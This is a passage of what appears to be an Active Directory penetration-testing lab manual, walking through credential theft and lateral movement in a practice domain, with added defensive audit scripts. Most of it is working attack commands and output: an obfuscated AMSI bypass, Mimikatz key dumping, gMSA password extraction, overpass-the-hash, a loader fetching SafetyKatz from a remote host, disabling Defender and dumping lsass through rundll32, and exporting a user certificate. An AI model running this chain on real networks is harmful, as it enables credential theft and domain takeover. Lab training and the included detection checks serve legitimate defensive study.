'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ;
( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL
)."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )
[us-mailmgmt]: PS C:\Users\Administrator\Documents> exit
PS C:\AD\Tools>

Now, load Invoke-Mimi in the remote session and execute it to extract the secrets. Note that we have
already disabled AMSI for this PSSession:

PS C:\AD\Tools> Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $mailmgmt
PS C:\AD\Tools> Enter-PSSession $mailmgmt
[us-mailmgmt]: PS C:\Users\Administrator\Documents> Invoke-Mimi -Command '"sekurlsa::keys"'

  .#####.   mimikatz 2.2.0 (x64) #18362 Oct 30 2019 13:01:25
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(powershell) # sekurlsa::keys

Authentication Id : 0 ; 44772476 (00000000:02ab2c7c)
Session           : Service from 0
User Name         : provisioningsvc
Domain            : US
Logon Server      : US-DC
Logon Time        : 11/5/2021 4:52:05 AM
SID               : S-1-5-21-210670787-2521448726-163245708-8602

         * Username : provisioningsvc
         * Domain   : US.TECHCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       a573a68973bfe9cbfb8037347397d6ad1aae87673c4f5b4979b57c0b745aee2a
           rc4_hmac_nt       44dea6608c25a85d578d0c2b6f8355c4
           rc4_hmac_old      44dea6608c25a85d578d0c2b6f8355c4
           rc4_md4           44dea6608c25a85d578d0c2b6f8355c4
           rc4_hmac_nt_exp   44dea6608c25a85d578d0c2b6f8355c4
           rc4_hmac_old_exp  44dea6608c25a85d578d0c2b6f8355c4

[snip]

Hands-On 10:
Task
• Enumerate gMSAs in the us.techcorp.local domain.
• Enumerate the principals that can read passwords from any gMSAs.
• Compromise one such principal and retrieve the password from a gMSA.
• Find if the gMSA has high privileges on any machine and extract credentials from that machine.

Solution
To enumerate gMSAs, we can use the ADModule:

C:\Users\studentuserx>cd C:\AD\Tools

C:\AD\Tools>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
PS C:\AD\Tools> Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

PS C:\AD\Tools> Get-ADServiceAccount -Filter *

DistinguishedName : CN=jumpone,CN=Managed Service Accounts,DC=us,DC=techcorp,DC=local
Enabled : True
Name : jumpone
ObjectClass : msDS-GroupManagedServiceAccount
ObjectGUID : 1ac6c58e-e81d-48a8-bc42-c768d0180603
SamAccountName : jumpone$
SID : S-1-5-21-210670787-2521448726-163245708-8601
UserPrincipalName :

Enumerate the Principals that can read the password blob:

PS C:\AD\Tools> Get-ADServiceAccount -Identity jumpone -Properties * | select
PrincipalsAllowedToRetrieveManagedPassword

PrincipalsAllowedToRetrieveManagedPassword
------------------------------------------
{CN=provisioning svc,CN=Users,DC=us,DC=techcorp,DC=local}
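The output above shows the finding a defender should be looking for: a user account (provisioning svc), rather than the host computer accounts, is allowed to retrieve the jumpone password blob. The following PowerShell is an added audit example, not part of the lab manual, that reports the readers of every gMSA in the domain and flags user-type readers and groups that contain users. It assumes the ActiveDirectory module is already imported (the Import-Module lines above) and that the caller can read PrincipalsAllowedToRetrieveManagedPassword, which authenticated users normally can; the function name and the Finding wording are my own.

```powershell
# Added audit, not from the lab manual: who can retrieve each gMSA's managed password?
# Assumes the ActiveDirectory module is loaded. Computer accounts (the hosts that run the
# service) are the expected readers; a user account, or a group containing users, means
# that compromising the user hands over the gMSA, which is the path this lab takes.

function Get-GmsaRetrieverReport {
    param(
        # Optional domain controller to query; when omitted the module picks one.
        [string]$Server
    )
    $serverArgs = @{}
    if ($Server) { $serverArgs.Server = $Server }

    $gmsas = Get-ADServiceAccount -Filter * -Properties PrincipalsAllowedToRetrieveManagedPassword @serverArgs

    foreach ($gmsa in $gmsas) {
        $principals = @($gmsa.PrincipalsAllowedToRetrieveManagedPassword)

        if ($principals.Count -eq 0) {
            [pscustomobject]@{
                gMSA      = $gmsa.SamAccountName
                Principal = '(none)'
                Class     = '-'
                Finding   = 'info: no principal may retrieve the password'
            }
            continue
        }

        foreach ($dn in $principals) {
            $obj = Get-ADObject -Identity $dn -Properties objectClass, sAMAccountName @serverArgs

            $finding = switch ($obj.objectClass) {
                'computer' { 'ok: host computer account' }
                'group' {
                    # Recursive expansion so a user nested two groups deep is still seen.
                    $members  = @(Get-ADGroupMember -Identity $dn -Recursive @serverArgs)
                    $nonHosts = @($members | Where-Object { $_.objectClass -ne 'computer' })
                    if ($nonHosts.Count -eq 0) {
                        "ok: group of $($members.Count) computer account(s)"
                    } else {
                        "REVIEW: group contains non-computer members: $(($nonHosts | ForEach-Object SamAccountName) -join ', ')"
                    }
                }
                'user' { 'REVIEW: user account can read the password; compromising this user compromises the gMSA' }
                default { "REVIEW: unexpected object class '$($obj.objectClass)'" }
            }

            [pscustomobject]@{
                gMSA      = $gmsa.SamAccountName
                Principal = $obj.sAMAccountName
                Class     = $obj.objectClass
                Finding   = $finding
            }
        }
    }
}

# Usage: report every gMSA in the current domain and highlight the entries that need review.
Get-GmsaRetrieverReport | Sort-Object gMSA | Format-Table -AutoSize
```

In this lab the report lists jumpone with a single user-class reader. The remediation is to point PrincipalsAllowedToRetrieveManagedPassword at the computer accounts that run the service (or a group containing only them) with Set-ADServiceAccount, and, until that is done, to treat every user-type reader as being as sensitive as the gMSA itself.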

Sweet! Recall that we got the secrets of provisioningsvc from us-mailmgmt. Start a new process as the
provisioningsvc user. Run the below command from an elevated cmd shell:

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth
/user:provisioningsvc /domain:us.techcorp.local
/aes256:a573a68973bfe9cbfb8037347397d6ad1aae87673c4f5b4979b57c0b745aee2a
/run:cmd.exe" "exit"
[snip]

In the new cmd session, run the following commands to retrieve the password blob:

C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\Windows\system32> Import-Module C:\AD\Tools\ADModule-
master\Microsoft.ActiveDirectory.Management.dll
PS C:\Windows\system32> Import-Module C:\AD\Tools\ADModule-
master\ActiveDirectory\ActiveDirectory.psd1
PS C:\Windows\system32> $Passwordblob = (Get-ADServiceAccount -Identity
jumpone -Properties msDS-ManagedPassword).'msDS-ManagedPassword'

Using the DSInternals module, let's decode the password blob and convert it to an NTLM hash (as the
clear-text password is not printable):

PS C:\Windows\system32> Import-Module
C:\AD\Tools\DSInternals_v4.7\DSInternals\DSInternals.psd1
PS C:\Windows\system32> $decodedpwd = ConvertFrom-ADManagedPasswordBlob
$Passwordblob
PS C:\Windows\system32> ConvertTo-NTHash -Password $decodedpwd.SecureCurrentPassword
0a02c684cc0fa1744195edd1aec43078

Now we can start a new process with the privileges of jumpone:

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth
/user:jumpone /domain:us.techcorp.local
/ntlm:0a02c684cc0fa1744195edd1aec43078 /run:cmd.exe" "exit"
[snip]

Check for admin privileges on a machine in the target domain. Run the below commands in the process
running with privileges of jumpone:

C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]
PS C:\Windows\system32> . C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
PS C:\Windows\system32> Find-PSRemotingLocalAdminAccess -Verbose
US-Jump

Sweet! We have administrative access to the US-Jump machine as jumpone. We can now access us-jump
using winrs or PowerShell Remoting.

Use winrs to access us-jump


We can access us-jump using winrs. In the process running as jumpone that we started above:

PS C:\Windows\system32>winrs -r:us-jump cmd


Microsoft Windows [Version 10.0.17763.1613]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\jumpone$>whoami
whoami
us\jumpone$

C:\Users\jumpone$>exit

Let's use Loader.exe to run SafetyKatz on us-jump:

C:\Windows\system32>echo F | xcopy C:\AD\Tools\Loader.exe \\us-jump\C$\Users\Public\Loader.exe /Y
Does \\us-jump\C$\Users\Public\Loader.exe specify a file name
or directory name on the target
(F = file, D = directory)? F
C:\AD\Tools\Loader.exe
1 File(s) copied

C:\Windows\system32>winrs -r:us-jump cmd


Microsoft Windows [Version 10.0.17763.1613]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\jumpone$>C:\Users\Public\Loader.exe -path http://192.168.100.x/SafetyKatz.exe
C:\Users\Public\Loader.exe -path http://192.168.100.x/SafetyKatz.exe
The system cannot execute the specified program.

So, we can't run binaries!

Let's try with Invoke-Mimi using PowerShell. First, we need to bypass AMSI:

C:\Users\jumpone$>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\jumpone$> S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') +
('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE (
('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"((
"{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE](
"{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -
VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -
f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'
s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -
f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f
('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"(
${n`ULl},${t`RuE} )
Cannot invoke method. Method invocation is supported only on core types in
this language mode.
At line:1 char:106
+ ... ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`
...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId :
MethodInvocationNotSupportedInConstrainedLanguage

PowerShell seems to be running in the Constrained Language Mode.

PS C:\Users\jumpone$> $ExecutionContext.SessionState.LanguageMode
$ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage

This could be the result of an application allowlisting solution. Let's check that!

AppLocker policies are stored in the registry. Let's query the registry on us-jump; if we get an error,
that means AppLocker is not in use. Note that the below command assumes that reg.exe is allowed to run.
We could also use PowerShell's Get-AppLockerPolicy -Effective command:

C:\Users\jumpone$>reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2
reg query HKLM\Software\Policies\Microsoft\Windows\SRPV2
ERROR: The system was unable to find the specified registry key or value.

We can check for WDAC using WMI. Let's try using wmic on us-jump:

C:\Users\jumpone$>wmic
wmic
The system cannot execute the specified program.

Looks like wmic is blocked too. We need to rely on the PowerShell cmdlet for WDAC detection:

C:\Users\jumpone$> powershell
PS C:\Users\jumpone$> Get-CimInstance -ClassName Win32_DeviceGuard -Namespace
root\Microsoft\Windows\DeviceGuard
Get-CimInstance -ClassName Win32_DeviceGuard -Namespace
root\Microsoft\Windows\DeviceGuard

AvailableSecurityProperties : {1, 2, 3, 5}
CodeIntegrityPolicyEnforcementStatus : 2
InstanceIdentifier : 4ff40742-2649-41b8-bdd1-e80fad1cce80
RequiredSecurityProperties : {0}
SecurityServicesConfigured : {0}
SecurityServicesRunning : {0}
UsermodeCodeIntegrityPolicyEnforcementStatus : 2
Version : 1.0
VirtualizationBasedSecurityStatus : 0
PSComputerName :

So, WDAC is running with Code Integrity enforced (a UsermodeCodeIntegrityPolicyEnforcementStatus of 2
means enforced), and that is the reason PowerShell is running in Constrained Language Mode (CLM). Note
that this will not allow Invoke-Mimi and most offensive PowerShell tools to run.

We now need to find a way around the application allowlisting. There are a couple of options discussed
below, but feel free to explore other ways of bypassing WDAC. Try Microsoft-signed binaries and scripts
(see the LOLBAS project - https://lolbas-project.github.io/) to check if the policy applied in the lab is
complete (it is not!).

You will find out that rundll32.exe is not blocked, as blocking it interferes with the proper functioning of
the target server (which is a VM). Please keep this in mind whenever you try to bypass an allowlisting
solution: in every enterprise, legitimate executables have to be allowed, and that is what we make use of.

We can use the following command to extract credentials from lsass using rundll32.exe. Both
rundll32.exe and comsvcs.dll are Microsoft-signed. We are creating a memory dump of the lsass process,
which we will parse offline on the student VM. Since the comsvcs.dll-based memory dump is detected by
Defender, we will need to disable Defender by executing the "Set-MpPreference
-DisableRealtimeMonitoring $true" command. A combination of WDAC and Defender with correct policies
and configuration makes it very difficult for attackers to compromise the machine or perform
post-exploitation actions on it.
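The paragraph above names the two host controls that stand in the way here: Defender real-time protection, which the lab has to switch off, and the fact that lsass can be opened for a MiniDump at all. The following PowerShell is an added defender-side check, not part of the lab manual, that reports whether LSA protection (RunAsPPL) is enabled, whether Defender real-time protection is currently on, lists recent Defender 5001 events (real-time protection turned off) and searches process-creation events for the comsvcs.dll MiniDump pattern used in the lab. The registry key, event IDs and 4688 field name are standard Windows; the function names, time windows and sample command lines are my own constructions. Run it with administrative rights on the server being assessed.

```powershell
# Added posture check, not from the lab manual. Run as an administrator on the host under review.
# Registry key, event IDs and field names are standard Windows; the sample command lines are constructed.

function Get-LsaProtectionStatus {
    # RunAsPPL makes lsass a Protected Process Light. Missing or 0 means not protected, so any
    # administrator (including rundll32 loading comsvcs.dll,MiniDump) can read its memory.
    $lsa   = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $value = if ($null -ne $lsa.RunAsPPL) { [int]$lsa.RunAsPPL } else { 0 }
    [pscustomobject]@{
        Check   = 'LSA protection (RunAsPPL)'
        Value   = $value
        Healthy = ($value -ne 0)
        Note    = if ($value -ne 0) { 'lsass runs as PPL' } else { 'lsass memory readable by any administrator' }
    }
}

function Get-DefenderRealtimeStatus {
    try {
        $rtp  = [bool](Get-MpComputerStatus -ErrorAction Stop).RealTimeProtectionEnabled
        $note = if ($rtp) { 'enabled' } else { 'disabled (e.g. Set-MpPreference -DisableRealtimeMonitoring $true)' }
    } catch {
        $rtp  = $false
        $note = "Defender status unavailable: $($_.Exception.Message)"
    }
    [pscustomobject]@{ Check = 'Defender real-time protection'; Value = $rtp; Healthy = $rtp; Note = $note }
}

function Get-RealtimeDisableEvents {
    param([int]$Days = 7)
    # Defender operational event 5001: real-time protection was turned off.
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue | Select-Object TimeCreated, Id, Message
}

function Test-LsassMiniDumpCommandLine {
    param([Parameter(Mandatory)][string]$CommandLine)
    # The signed-binary dump path used in this lab: rundll32 calling comsvcs.dll's MiniDump export.
    # The two tokens are matched independently because argument order, casing and path spelling vary.
    return ($CommandLine -match 'comsvcs\.dll' -and $CommandLine -match '\bMiniDump\b')
}

function Find-LsassMiniDumpEvents {
    param([int]$Days = 7)
    # Needs "Audit Process Creation" with "Include command line in process creation events" enabled.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddDays(-$Days) } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $data = ([xml]$_.ToXml()).Event.EventData.Data
            $cmd  = ($data | Where-Object Name -eq 'CommandLine').'#text'
            if ($cmd -and (Test-LsassMiniDumpCommandLine -CommandLine $cmd)) {
                [pscustomobject]@{ Time = $_.TimeCreated; CommandLine = $cmd }
            }
        }
}

# Constructed sample lines showing what the matcher does and does not flag.
$SampleCommandLines = @(
    'rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 708 C:\Users\Public\lsass.dmp full'  # flagged
    'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL'                                  # not flagged
    'tasklist /FI "IMAGENAME eq lsass.exe"'                                                         # not flagged
)
$SampleCommandLines | ForEach-Object {
    [pscustomobject]@{ Flagged = (Test-LsassMiniDumpCommandLine -CommandLine $_); CommandLine = $_ }
} | Format-Table -AutoSize

@(Get-LsaProtectionStatus; Get-DefenderRealtimeStatus) | Format-Table Check, Value, Healthy, Note -AutoSize
Get-RealtimeDisableEvents | Format-Table -AutoSize
Find-LsassMiniDumpEvents   | Format-Table -AutoSize
```

A host where RunAsPPL is set will refuse the MiniDump even to an administrator, and a 5001 event on a server that nobody is meant to be reconfiguring is worth an alert on its own, independent of whether the dump command was ever seen.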

Please note that '708' in the below command is the PID of lsass.exe process and may be different for
you:

C:\Users\jumpone$>tasklist /FI "IMAGENAME eq lsass.exe"
tasklist /FI "IMAGENAME eq lsass.exe"

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
lsass.exe                      708 Services                   0     17,844 K

C:\Users\jumpone$>rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 708 C:\Users\Public\lsass.dmp full
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 708 C:\Users\Public\lsass.dmp full

C:\Users\jumpone$>dir C:\Users\Public\lsass.dmp
dir C:\Users\Public\lsass.dmp
Volume in drive C has no label.
Volume Serial Number is 88AD-6C8B

Directory of C:\Users\Public

01/13/2021 07:31 AM 46,771,786 lsass.dmp


[snip]
C:\Users\jumpone$>exit
exit

Now, copy the lsass.dmp to the student VM. Use the below commands in the process running as
jumpone:

C:\Windows\system32>echo F | xcopy \\us-jump\C$\Users\Public\lsass.dmp C:\AD\Tools\lsass.dmp
Does C:\AD\Tools\lsass.dmp specify a file name
or directory name on the target
(F = file, D = directory)? F
\\us-jump\C$\Users\Public\lsass.dmp
1 File(s) copied

Note that if we had RDP access to us-jump, we could also use the Task Manager to dump lsass from
us-jump. The biggest drawback is that it needs RDP access to the target server and clear-text credentials.

After copying the lsass.DMP to our machine, let's use Mimikatz to extract credentials from it. Remember
to run mimikatz.exe with administrative privileges:

  .#####.   mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz # sekurlsa::minidump C:\AD\Tools\lsass.DMP
Switch to MINIDUMP : 'C:\AD\Tools\lsass.DMP'

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::keys
Opening : 'C:\AD\Tools\lsass.DMP' file for minidump...

Authentication Id : 0 ; 73197 (00000000:00011ded)
Session           : Service from 0
User Name         : appsvc
Domain            : US
Logon Server      : US-DC
Logon Time        : 9/23/2021 11:30:42 PM
SID               : S-1-5-21-210670787-2521448726-163245708-4601

         * Username : appsvc
         * Domain   : US.TECHCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       b4cb0430da8176ec6eae2002dfa86a8c6742e5a88448f1c2d6afc3781e114335
           rc4_hmac_nt       1d49d390ac01d568f0ee9be82bb74d4c
           rc4_hmac_old      1d49d390ac01d568f0ee9be82bb74d4c
           rc4_md4           1d49d390ac01d568f0ee9be82bb74d4c
           rc4_hmac_nt_exp   1d49d390ac01d568f0ee9be82bb74d4c
           rc4_hmac_old_exp  1d49d390ac01d568f0ee9be82bb74d4c

[snip]

Authentication Id : 0 ; 765003 (00000000:000bac4b)
Session           : Service from 0
User Name         : webmaster
Domain            : US
Logon Server      : US-DC
Logon Time        : 9/24/2021 12:01:17 AM
SID               : S-1-5-21-210670787-2521448726-163245708-1140

         * Username : webmaster
         * Domain   : US.TECHCORP.LOCAL
         * Password : (null)
         * Key List :
           aes256_hmac       2a653f166761226eb2e939218f5a34d3d2af005a91f160540da6e4a5e29de8a0
           rc4_hmac_nt       23d6458d06b25e463b9666364fb0b29f
           rc4_hmac_old      23d6458d06b25e463b9666364fb0b29f
           rc4_md4           23d6458d06b25e463b9666364fb0b29f
           rc4_hmac_nt_exp   23d6458d06b25e463b9666364fb0b29f
           rc4_hmac_old_exp  23d6458d06b25e463b9666364fb0b29f

Note that we found out that reg.exe is allowed on the machine. In other scenarios, that will help in
getting local user creds, machine account hash and Domain Cached Credentials from the registry!

We may also like to check if there are any certificates that we can extract. For that, we will use
PowerShell to check the LocalMachine and user certificate stores.

Let's check certificate store LocalMachine on us-jump. We will copy InvisiShell on the machine to avoid
PowerShell logging. Run the following commands on the student machine in a process running as
jumpone:

C:\Windows\System32>echo F | xcopy
C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat \\us-
jump\C$\Users\Public\RunWithRegistryNonAdmin.bat /Y

C:\Windows\System32>echo F | xcopy C:\AD\Tools\InviShell\InShellProf.dll
\\us-jump\C$\Users\Public\InShellProf.dll /Y

Connect to us-jump and run InvisiShell:

C:\Windows\System32>winrs -r:us-jump cmd


Microsoft Windows [Version 10.0.17763.2213]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\jumpone$>C:\Users\Public\RunWithRegistryNonAdmin.bat
[snip]

In the PowerShell session that starts, run the following command to list all the certificates in the
LocalMachine certificate store. Note that our ability to use tools like Mimikatz to export certificates is
limited by the presence of WDAC on us-jump:

PS C:\Users\jumpone$> ls cert:\LocalMachine\My
ls cert:\LocalMachine\My
PSParentPath: Microsoft.PowerShell.Security\Certificate::LocalMachine\My

Thumbprint Subject
---------- -------
BAD78F43BB4CB13C4843E49B51AA051530FFBBDB [email protected],
CN=pawadmin, CN=Users, DC=us, DC=techcorp, DC=l

We have a certificate for the user pawadmin in the store! Let's try to export it:

PS C:\Users\jumpone$> ls
cert:\LocalMachine\My\BAD78F43BB4CB13C4843E49B51AA051530FFBBDB | Export-
PfxCertificate -FilePath C:\Users\Public\pawadmin.pfx -Password (ConvertTo-
SecureString -String 'SecretPass@123' -Force -AsPlainText)
ls cert:\LocalMachine\My\BAD78F43BB4CB13C4843E49B51AA051530FFBBDB | Export-
PfxCertificate -FilePath C:\Users\Public\pawadmin.pfx -Password (ConvertTo-
SecureString -String 'SecretPass@123' -Force -AsPlainText)

Directory: C:\Users\Public

Mode LastWriteTime Length Name


---- ------------- ------ ----
-a---- 11/8/2021 8:25 AM 4713 pawadmin.pfx
PS C:\Users\jumpone$> exit
exit

C:\Users\jumpone$>set COR_ENABLE_PROFILING=

C:\Users\jumpone$>set COR_PROFILER=

C:\Users\jumpone$>REG DELETE "HKCU\Software\Classes\CLSID\{cf0d821e-299b-
5307-a3d8-b283c03916db}" /f
The operation completed successfully.

C:\Users\jumpone$>exit
exit

C:\Windows\system32>

Copy the certificate to the student VM:

C:\Windows\system32>echo F | xcopy \\us-jump\C$\Users\Public\pawadmin.pfx C:\AD\Tools\pawadmin.pfx
Does C:\AD\Tools\pawadmin.pfx specify a file name
or directory name on the target
(F = file, D = directory)? F
\\us-jump\C$\Users\Public\pawadmin.pfx
1 File(s) copied

We will use this certificate later!
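The pawadmin export above worked because a user logon certificate, private key included, was sitting in the LocalMachine personal store of a server that other people administer. The following PowerShell is an added check, not part of the lab manual, that lists certificates in a store which carry a user identity (a UPN in the Subject Alternative Name, or a subject under CN=Users) and can be used for client authentication, and flags those that have a private key. The OIDs and store paths are standard; the function names, the user-certificate heuristic and the Finding wording are my own assumptions. Run it locally on the host under review, or through Invoke-Command.

```powershell
# Added check, not from the lab manual: user logon certificates kept (with private keys) in a machine
# store are exactly what the pawadmin export harvested. OIDs and store paths are standard Windows;
# the heuristic and wording below are my own.

$ClientAuthOid     = '1.3.6.1.5.5.7.3.2'        # id-kp-clientAuth
$SmartCardLogonOid = '1.3.6.1.4.1.311.20.2.2'   # Microsoft Smart Card Logon
$SanOid            = '2.5.29.17'                # Subject Alternative Name

function Get-CertEkuOids {
    param([System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)
    $ext = $Cert.Extensions |
        Where-Object { $_ -is [System.Security.Cryptography.X509Certificates.X509EnhancedKeyUsageExtension] }
    if ($null -eq $ext) { return @() }   # no EKU extension = valid for any purpose
    return @($ext.EnhancedKeyUsages | ForEach-Object { $_.Value })
}

function Get-CertUpn {
    param([System.Security.Cryptography.X509Certificates.X509Certificate2]$Cert)
    # The SAN UPN is what PKINIT maps to a user, so its presence marks a logon certificate.
    $san = $Cert.Extensions | Where-Object { $_.Oid.Value -eq $SanOid }
    if ($null -eq $san) { return $null }
    if ($san.Format($false) -match 'Principal Name=([^,\s]+)') { return $Matches[1] }
    return $null
}

function Find-UserLogonCertsInStore {
    param([string]$StorePath = 'Cert:\LocalMachine\My')
    foreach ($cert in Get-ChildItem -Path $StorePath) {
        $ekus = Get-CertEkuOids -Cert $cert
        $upn  = Get-CertUpn -Cert $cert
        $logonCapable = ($ekus.Count -eq 0) -or ($ekus -contains $ClientAuthOid) -or ($ekus -contains $SmartCardLogonOid)
        # A user certificate is one carrying a UPN or issued to an object under the Users container.
        $isUserCert = ($null -ne $upn) -or ($cert.Subject -match 'CN=Users,')
        if (-not ($logonCapable -and $isUserCert)) { continue }

        $finding = if ($cert.HasPrivateKey) {
            'REVIEW: user logon certificate with private key in this store; anyone with admin on the host can authenticate as the user'
        } else { 'info: user certificate without private key' }

        [pscustomobject]@{
            Store         = $StorePath
            Thumbprint    = $cert.Thumbprint
            Subject       = $cert.Subject
            Upn           = $upn
            HasPrivateKey = $cert.HasPrivateKey
            NotAfter      = $cert.NotAfter
            Finding       = $finding
        }
    }
}

# Usage: check the machine personal store and the personal store of the current user.
'Cert:\LocalMachine\My', 'Cert:\CurrentUser\My' |
    ForEach-Object { Find-UserLogonCertsInStore -StorePath $_ } |
    Format-List Store, Subject, Upn, HasPrivateKey, NotAfter, Finding
```

On us-jump this flags the pawadmin certificate. The fix is to keep user logon certificates in the user's own profile store (or on a smart card) and, where a machine store entry is unavoidable, to issue it with a non-exportable key so that Export-PfxCertificate as used above fails.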

Hands-On 11:
Task
• Find a server in US domain where Unconstrained Delegation is enabled.
• Compromise that server and get Domain Admin privileges.

Solution
First, we need to find out the machines in us.techcorp.local with unconstrained delegation. We can use
PowerView or Active Directory module for that. Using the ActiveDirectory module:

PS C:\AD\Tools> Get-ADComputer -Filter {TrustedForDelegation -eq $True}


DistinguishedName : CN=US-DC,OU=Domain Controllers,DC=us,DC=techcorp,DC=local
DNSHostName : US-DC.us.techcorp.local
Enabled : True
Name : US-DC
ObjectClass : computer
ObjectGUID : 2edf59cf-aa6e-448a-9810-7a81a3d3af16
SamAccountName : US-DC$
SID : S-1-5-21-210670787-2521448726-163245708-1000
UserPrincipalName :

DistinguishedName : CN=US-WEB,CN=Computers,DC=us,DC=techcorp,DC=local
DNSHostName : US-Web.us.techcorp.local
Enabled : True
Name : US-WEB
ObjectClass : computer
ObjectGUID : cb00dc1e-3619-4187-a02b-42f9c964a637
SamAccountName : US-WEB$
SID : S-1-5-21-210670787-2521448726-163245708-1110

Please note that DCs always have unconstrained delegation enabled. So, we need to compromise us-web.
Recall that we got the credentials of webmaster in the previous hands-on. Let's check if that user has
administrative access to us-web. We will use an OverPass-The-Hash attack with webmaster's AES keys
using SafetyKatz; you can use other tools of your choice. Run the below from an elevated shell:

C:\Windows\system32>C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth /user:webmaster
/domain:us.techcorp.local
/aes256:2a653f166761226eb2e939218f5a34d3d2af005a91f160540da6e4a5e29de8a0
/run:cmd.exe" "exit"

[*] Dumping lsass (704) to C:\Windows\Temp\test.txt


[+] Dump successful!

[*] Executing loaded Mimikatz PE

  .#####.   mimikatz 2.2.0 (x64) #19041 Dec 18 2020 22:37:12
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com   ***/

mimikatz(commandline) # sekurlsa::opassth /user:webmaster /domain:us.techcorp.local
/aes256:2a653f166761226eb2e939218f5a34d3d2af005a91f160540da6e4a5e29de8a0 /run:cmd.exe
user : webmaster
domain : us.techcorp.local
program : cmd.exe
impers. : no
AES256 : 2a653f166761226eb2e939218f5a34d3d2af005a91f160540da6e4a5e29de8a0
| PID 2852
| TID 3900
